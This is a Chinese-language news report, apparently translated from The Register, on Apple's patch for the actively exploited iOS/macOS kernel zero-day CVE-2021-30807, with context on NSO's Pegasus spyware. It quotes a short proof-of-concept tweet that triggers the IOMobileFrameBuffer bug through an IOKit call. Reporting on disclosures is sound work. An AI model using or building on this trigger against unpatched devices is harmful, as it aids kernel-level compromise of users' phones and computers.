天天看點

Apple更新檔解決iOS、iPadOS和macOS中的0day漏洞

Apple在周一修補了iOS、iPadOS和macOS作業系統中的一個0day漏洞,僅僅一周前釋出了一套作業系統更新,解決了大約30多個其他漏洞。

該漏洞 CVE-2021-30807 是在iGiant的IOMobileFrameBuffer子產品代碼中發現的,這是一個用于管理螢幕幀緩沖區的核心擴充,可被濫用在受影響的裝置上運作惡意代碼。

CVE-2021-30807歸功于一位匿名研究人員,已經被未公開但據稱是改進的記憶體處理代碼所解決。

“一個應用程式可能能夠以核心權限執行任意代碼。”這家 iDevice 制造商在其一份重複公告中表示。“蘋果已經注意到了一份報告,稱這個問題可能被積極利用了。“

不過,蘋果沒有透露誰可能參與了這一漏洞的利用。該公司也沒有回答有關該漏洞是否被NSO集團的Pegasus監控軟體利用的問題。

上周,國際上特赦組織和媒體宣傳組織Forbidden Stories發表了一系列名為Pegasus Project的文章,詳細介紹了NSO的軟體是如何被用來監視政客、記者和政治活動家的。

這些組織表示,他們發現了“Pegasus零點選攻擊被用來在iPhone上安裝間諜軟體”的證據。具體來說,他們表示該軟體已被用于攻擊 iPhone 11 和 12 上的 iMessage。

在蘋果的公告釋出後不久,PoC漏洞利用代碼便通過Twitter釋出:

CVE-2021-30807 PoC:

int main(){
io_service_t s = IOServiceGetMatchingService(0, IOServiceMatching("AppleCLCD"));
io_connect_t c;
IOServiceOpen(s,mach_task_self(),0,&c);
uint64_t a[1] = {0xFFFFFFFF};
uint64_t b[1] = {0};
uint32_t o = 1;
IOConnectCallScalarMethod(c,83,a,1,b,&o);
}
           

———binaryboy (@b1n4r1b01) 2021 年 7 月 26 日

另外,安全研究員Saar Amar表示,他在四個月前就發現了該漏洞,但沒有報告,因為他打算下個月制定一個高品質的bug送出。但看到這個漏洞已被披露,他發表了一篇關于他的發現的文章。

在過去十年中,IOMobileFrameBuffer多次提供了進入Apple軟體的途徑。想必庫珀蒂諾的編碼人員會更仔細地研究這個軟體,看看是否還有其他遺漏的地方。

https://www.theregister.com/2021/07/27/apple_patches_zeroday/